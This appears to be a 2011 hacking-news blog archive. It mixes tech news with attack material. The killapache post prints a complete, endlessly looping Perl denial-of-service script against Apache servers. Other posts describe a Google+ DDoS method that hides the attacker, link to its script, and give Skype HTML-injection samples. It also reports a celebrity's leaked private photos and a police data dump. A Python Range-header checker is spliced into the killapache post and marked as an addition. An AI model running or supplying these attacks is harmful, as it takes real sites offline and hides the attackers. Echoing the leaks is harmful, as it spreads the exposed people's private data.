Wednesday 31 August 2011

Julianne Hough's Phone Hacked


Singer/actress Julianne Hough's phone has been hacked, and private photos of her have been published on the internet. Not much information is available about this hack yet. A picture of Julianne Hough in a bikini is available online, with the claim that it comes from the hacked phone. The rest of the collection includes photos of her on various film sets, including the upcoming movies Footloose and Rock of Ages, and images of her with boyfriend Ryan Seacrest.

Monday 29 August 2011

DDoS using Google servers



It's true, Google helps everyone. Recently we had the killapache DoS; now we have DDoS + proxy with the help of Google+.
How does DDoS via Google+ work?
The vulnerable pages are /_/sharebox/linkpreview/ and “gadgets/proxy?”
It is possible to request any file type, and G+ will download and show all the content. So if you parallelize many requests, it is possible to DDoS any site with Google bandwidth. It is also possible to start the attack without being logged in to G+.

Attack vectors:

The advantage of using Google and making requests through their servers is to be even more anonymous when you attack some site (TOR + this method). The funny thing is that Apache will log Google IPs.
But beware: gadgets/proxy? will send your IP in the Apache log; if you want to attack, you’ll need to use /_/sharebox/linkpreview/




+DDoS source code download:

http://www.ihteam.net/advisories/_154785695367_+ddos.sh

source

EDIT - This vulnerability has been patched!

MSN.Com Vulnerable to XSS



TeamDX discovered an XSS vulnerability in MSN.com. The vulnerable link is here. XSS is a computer security vulnerability that lets attackers inject client-side script into web pages viewed by other users.

Sunday 28 August 2011

Killapache: DDOS Tool For Apache Servers




The Apache Software Foundation has announced a denial-of-service vulnerability that affects all versions of the ubiquitous Apache web server, leaving up to 65% of all websites vulnerable. An unknown flaw in the code for processing byte range headers allows versions 2.2.x of the Apache Web Server to be crippled from a single PC. An “Apache Killer” Perl script impressively demonstrates the problem.


Advisory - Click here 


How does the killapache DDoS tool work?
killapache sends GET requests with multiple “byte ranges” that will claim large portions of the system’s memory space. A “byte range” statement allows a browser to only load certain parts of a document, for example bytes 500 to 1000. It is normally used while downloading large files. This method is used by programs such as download clients to resume downloads that have been interrupted; it is designed to reduce bandwidth requirements. However, it appears that stating multiple unsorted components in the header can cause an Apache server to malfunction.
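The kind of Range-header check a server or filtering proxy could apply to the request described above, as an added example that is not part of the original post or of Apache's own fix. The threshold `MAX_RANGES` and all function names are assumptions, and the sample headers are constructed.

```python
import re

MAX_RANGES = 10  # assumed policy threshold, not a value from the page
_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_byte_ranges(value):
    """Parse 'bytes=a-b,c-,-n' into (first, last) tuples; None marks an open end."""
    unit, sep, specs = value.strip().partition("=")
    if not sep or unit.strip().lower() != "bytes":
        raise ValueError("not a bytes range")
    ranges = []
    for spec in specs.split(","):
        m = _SPEC.match(spec.strip())
        if not m or not (m.group(1) or m.group(2)):
            raise ValueError("bad range spec: %r" % spec)
        first, last = (int(g) if g else None for g in m.groups())
        ranges.append((first, last))
    return ranges


def count_overlaps(ranges, size):
    """Resolve ranges against a resource of `size` bytes; count those overlapping another."""
    resolved = []
    for first, last in ranges:
        if first is None:  # suffix form: the final `last` bytes
            start, end = max(size - last, 0), size - 1
        else:
            start, end = first, size - 1 if last is None else min(last, size - 1)
        if start <= end:  # drop unsatisfiable specs such as 5-0
            resolved.append((start, end))
    overlaps, high = 0, -1
    for start, end in sorted(resolved):
        if start <= high:
            overlaps += 1
        high = max(high, end)
    return overlaps


def assess_range_header(value, size, max_ranges=MAX_RANGES):
    """Classify a Range header as 'ok', 'malformed', 'too-many-ranges' or 'overlapping'."""
    try:
        ranges = parse_byte_ranges(value)
    except ValueError:
        return "malformed"
    if len(ranges) > max_ranges:
        return "too-many-ranges"
    return "overlapping" if count_overlaps(ranges, size) else "ok"


def killapache_style_header(n=1300):
    """Constructed sample with the shape the script on this page builds: 0-,5-0,...,5-(n-1)."""
    return "bytes=0-" + "".join(",5-%d" % k for k in range(n))
```

A legitimate resume request such as `bytes=500-1000` is classified `ok`, while the 1301-range header is rejected on count alone before any overlap analysis runs.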

The code
  1. #Apache httpd Remote Denial of Service (memory exhaustion)

  2. #By Kingcope

  3. #Year 2011

  4. #

  5. # Will result in swapping memory to filesystem on the remote side

  6. # plus killing of processes when running out of swap space.

  7. # Remote System becomes unstable.

  8. #

  9.  

  10. use IO::Socket;

  11. use Parallel::ForkManager;

  12.  

  13. sub usage {

  14.         print "Apache Remote Denial of Service (memory exhaustion)\n";

  15.         print "by Kingcope\n";

  16.         print "usage: perl killapache.pl <host> [numforks]\n";

  17.         print "example: perl killapache.pl www.example.com 50\n";

  18. }

  19.  

  20. sub killapache {

  21. print "ATTACKING $ARGV[0] [using $numforks forks]\n";

  22.        

  23. $pm = new Parallel::ForkManager($numforks);

  24.  

  25. $|=1;

  26. srand(time());

  27. $p = "";

  28. for ($k=0;$k<1300;$k++) {

  29.         $p .= ",5-$k";

  30. }

  31.  

  32. for ($k=0;$k<$numforks;$k++) {

  33. my $pid = $pm->start and next;  

  34.        

  35. $x = "";

  36. my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],

  37.                                  PeerPort => "80",

  38.                                          Proto    => 'tcp');

  39.  

  40. $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";

  41. print $sock $p;

  42.  

  43. while(<$sock>) {

  44. }

  45.  $pm->finish;

  46. }

  47. $pm->wait_all_children;

  48. print ":pPpPpppPpPPppPpppPp\n";

  49. }

  50.  

  51. sub testapache {

  52. my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],

  53.                                  PeerPort => "80",

  54.                                          Proto    => 'tcp');

  55.  

  56. $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";

  57. print $sock $p;

  58.  

  59. $x = <$sock>;

  60. if ($x =~ /Partial/) {

  61.         print "host seems vuln\n";

  62.         return 1;      

  63. } else {

  64.         return 0;      

  65. }

  66. }

  67.  

  68. if ($#ARGV < 0) {

  69.         usage;

  70.         exit;  

  71. }

  72.  

  73. if ($#ARGV > 1) {

  74.         $numforks = $ARGV[1];

  75. } else {$numforks = 50;}

  76.  

  77. $v = testapache();

  78. if ($v == 0) {

  79.         print "Host does not seem vulnerable\n";

  80.         exit;  

  81. }

  82. while(1) {

  83. killapache();

  84. }

Friday 26 August 2011

Create Google+ Add To Circles Include update feed Widget For Blogger



Create a Google+ “Add To Circles” widget for Blogger that includes an update feed, real-time follower stats for your Google Plus circles and an “Add me To Circles” button. The widget is completely customizable and will blend with any site theme perfectly. The number of followers displayed by the widget is updated automatically. You just need to fetch the code and paste it on your blog. Let's see how!
  1. You just need to visit the Google Plus widget homepage, i.e. Click here

  2. Click the Get Widget button

  3. Create your widget by using the tabs to fully customize the look of your button

  4. Enter your Google+ ID in the basic settings tab. You can get your Plus ID by going to your Google Plus profile page and then copying the digital code from your browser address bar as shown below

  5. Set the widget width equal to the width of your sidebar. In my case I have kept it 292

  6. You can also change the language of the add me button from basic settings. Currently 9 languages are supported.

  7. Once you are done, simply hit the Get Code button at the top. Copy the code and then go to Blogger > Design

  8. Select an HTML/JavaScript widget

  9. Paste your code inside it and hit save.

  10. You are all done!

Do let me know if you need any further assistance. Have Fun. :)


Wednesday 24 August 2011

Steve Jobs Resigns As CEO Of Apple

Today Apple CEO Steve Jobs resigned. Here is the letter by Steve Jobs:


To the Apple Board of Directors and the Apple Community:

I have always said if there ever came a day when I could no longer meet my duties and expectations as Apple’s CEO, I would be the first to let you know. Unfortunately, that day has come.

I hereby resign as CEO of Apple. I would like to serve, if the Board sees fit, as Chairman of the Board, director and Apple employee.
As far as my successor goes, I strongly recommend that we execute our succession plan and name Tim Cook as CEO of Apple.

I believe Apple’s brightest and most innovative days are ahead of it. And I look forward to watching and contributing to its success in a new role.
I have made some of the best friends of my life at Apple, and I thank you all for the many years of being able to work alongside you.
Steve



Apple has confirmed that Apple COO Tim Cook will replace Jobs as CEO, following Jobs’ own recommendation. Considering that Cook has filled in for Jobs in the times of his medical leaves (including the one he has been on this year), this has been widely expected if and when it came time for Jobs to step down. Also as requested, Jobs has been elected as Chairman of the Board and will remain with the company in that capacity. Cook will join the Board as well.

Sony Tablet S (S1) Could Be Launched Next Month



The tablet will mark Sony's entry into the Android tablet scene.
Sony has been teasing the S1 and the foldable dual-screen S2 tablet for quite some time now, but we weren't given a definitive launch date. However, it now seems we could see the tablet in action pretty soon. It has been reported that the S1 tablet will break cover as early as next month and will be called the Sony Tablet S. Obviously, S1 was just the preliminary name given to the tablet so as to keep the real name under wraps. This info comes from a bunch of spy shots captured by a source. The September launch sounds plausible since the company originally intended to launch the device during the same time frame.
The spy shots also shed some light on the tablet's features. Apparently, the Tablet S will feature Sony's Music and Video Unlimited service, which will let users download video and audio content seamlessly. Additionally, the Tablet S is PlayStation certified and will come packing with some games which can also be downloaded from a vast collection. Hardware wise, the S Tablet will feature a 9.4" display with TruBlack and the Sony Bravia technology, a 5 MP camera on the back with a 3 MP camera on the front for video calls. It will be powered by a 1 GHz dual core NVIDIA Tegra 2 processor, and feature DLNA capabilities for easy sharing, along with the ability to run as an infrared remote. It will run on the Android 3.1 Honeycomb with a 3.2 update on the horizon, though we have every reason to believe that the tablet will run Android 3.2 out of the box.

As far as the pricing of the device is concerned, it is believed that the Tablet S will be priced somewhere around $600 (Rs. 27,000 approx), which goes well with the current lot of Honeycomb tablets that are available in the market. People have high hopes with Sony and it is expected that the company will not disappoint. We'll have to wait until next month to find out if Sony has produced a winner with the Tablet S.

Monday 22 August 2011

Facebook official security guide

Facebook recently released the Facebook Security Guide, 14 pages in all. Written by Linda McCarthy, former Senior Director of Internet Safety at Symantec, Keith Watson, security research engineer at Purdue University, and teacher and editor Denise Weldon-Siviy, it offers tips on:
  •  Protecting your Facebook account

  • Avoiding the scammers (very helpful examples of the most popular Facebook scams)

  • Using advanced security settings (one-time passwords, secure browsing, single sign-on, social authentication, etc.)

  • Recovering a hacked Facebook account

  • Stopping imposters.



Written in a manner understandable to anyone and everyone, it should be a required read for everybody who begins using the social network and for many old users who are ignorant of the fact that they need protection.



Click To Download

Wordpress 3.2.1 persistent xss exploit




Here is WordPress 3.2.1 Core (post-template.php) Improper Sanitizing (Persistent XSS) by silentph33r aka Darshit Ashara. This is an author-level vulnerability.

A WordPress vulnerability was recently reported in timthumb, and now a new vulnerability has been discovered in the core modules.

Author : Darshit Ashara
Contact : john_pwnr@yahoo.com
Love to : A Gondela, Y Jaygadkar, A Dhaka, Rahul Sasi,
Team Indishell and Garage4hackers.

=======================================================
Improperly sanitized code in Wordpress Core Module (post-template.php)
causing cross-site scripting.
It will give out an alert on the index page and post page.


Below are the temporary patches for fixing.
Vendor notified about this vulnerability.



/*This will patch XSS in Index Page*/
Vulnerable Code Part 1
function the_title($before = '', $after = '', $echo = true) {
    $title = get_the_title();

    if ( strlen($title) == 0 )
        return;

    $title = $before . $title . $after;

    if ( $echo )
        echo htmlentities($title); /* Line No 52 Patch*/
    else
        return htmlentities($title); /* Line No 54 Patch*/
}
 Vulnerable Code Part 2
function the_title_attribute( $args = '' ) {
    $title = get_the_title();

    if ( strlen($title) == 0 )
        return;

    $defaults = array('before' => '', 'after' =>  '', 'echo' => true);
    $r = wp_parse_args($args, $defaults);
    extract( $r, EXTR_SKIP );


    $title = $before . $title . $after;
    $title = esc_attr(strip_tags($title));

    if ( $echo )
        echo htmlentities($title) ;/* Line No 87 Patch here By adding htmlentities*/
    else
        return htmlentities($title); /* Line No 89 Patch*/
}
Patch for this wordpress vulnerability

Vulnerable Code Part 3
function get_the_title( $id = 0 ) {
    $post = &get_post($id);

    $title = isset($post->post_title) ? $post->post_title : '';
    $id = isset($post->ID) ? $post->ID : (int) $id;

    if ( !is_admin() ) {
        if ( !empty($post->post_password) ) {
            $protected_title_format = apply_filters('protected_title_format', __('Protected: %s'));
            $title = sprintf($protected_title_format, $title);
        } else if ( isset($post->post_status) && 'private' == $post->post_status ) {
            $private_title_format = apply_filters('private_title_format', __('Private: %s'));
            $title = sprintf($private_title_format, $title);
        }
    }
    return htmlentities(apply_filters( 'the_title', $title, $id )); /* Line No 119 Patch*/
}


Skype Zeroday HTML/Javascript code injection

Noptri Public Security has released a working zero-day vulnerability for Skype, with a POC. Skype users need to be aware of this vulnerability.






Vendor:
=======

Skype - http://www.skype.com/





Affected Product:

=================

Skype in version <= 5.5.0.113





Affected Platforms:

===================

Windows (XP, Vista, 7)


Problem Description:

====================

Skype suffers from a persistent code injection vulnerability due to a lack
of input validation and output sanitization of following profile entries:



[+] home

[+] office

[+] mobile

POC of Skype 0day vulnerability 

The following HTML codes can be used to trigger the described vulnerability:



--- SNIP ---



[+] Home Phone Number:

<b>INJECTION HERE</b>



[+] Office Phone Number:

<center><i>INJECTION HERE</i></center>



[+] Mobile Phone Number:

<a href="#">INJECTION HERE</a>



--- SNIP ---
Using this code, an attacker could, for example, inject HTML/JavaScript code. It has not been verified, though, whether it is possible to hijack cookies or to attack the underlying operating system. An attacker could give it a try using external .js files.

Friday 19 August 2011

BART Police Database Hacked by Anonymous #OpBART

A database with information about members of the BART (Bay Area Rapid Transit) police has been exposed by Anonymous hackers in the #OpBART operation.

The database, published on Pastebin, contained information on names, addresses and accounts for more than 100 police officers. The Pastebin also contained a link to the campaign OpBart that is executed by Hacktivist group Anonymous.

The reason behind the Anonymous operation is the “censorship” of the subterranean cellular voice and data network in San Francisco’s Bay Area Rapid Transit (BART) system while people were protesting the fatal shooting of a homeless man by BART police.

Anonymous has attacked a BART user database before. During the OpBART campaign, it published data on the 3000 accounts of the police obtained from the site MyBart.

The group says it is protesting the recent shootings, organized by BART Police, as well as the agency’s decision to disable wireless connections to disrupt the protests in San Francisco.

While the BART Police Officers’ Association website was unavailable, the agency published a message on its official website condemning the attack.

“We condemn this latest attack on the working men and women of BART,” interim general manager Sherwood Wakeman said in a statement. “We are deeply concerned about the safety and security of our employees and their families. We stand behind them and our customers who were the subject of an earlier attack. We are deeply troubled by these actions.”

No matter who carried out this attack, securing data is one of the most important things we should care about. If we hold such sensitive information, we need to keep it offline so that no one can get at it, or we need a security audit and periodic penetration tests to get a clear idea of whether our databases are vulnerable to attack.

Backtrack 5 R1 Released




BackTrack is a Linux-based penetration testing arsenal that helps security professionals perform assessments in a purely native environment dedicated to hacking. Whether you’re making BackTrack your primary operating system or booting from a LiveDVD, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.




The Change Log -

  • This release contains over 120 bug fixes, 30 new tools and 70 tool updates.

  • The kernel was updated to 2.6.39.4 and includes the relevant injection patches



In the words of the BackTrack developers: "We are really happy with this release, and believe that as with every release, this is our best one yet. Some pesky issues such as rfkill in VMWare with rtl8187 issues have been fixed, which provides for a much more solid experience with BackTrack. We’ve released Gnome and KDE ISO images for 32 and 64 bit (no arm this release, sorry!), as well as a VMWare image of a 32 bit Gnome install, with VMWare Tools pre-installed."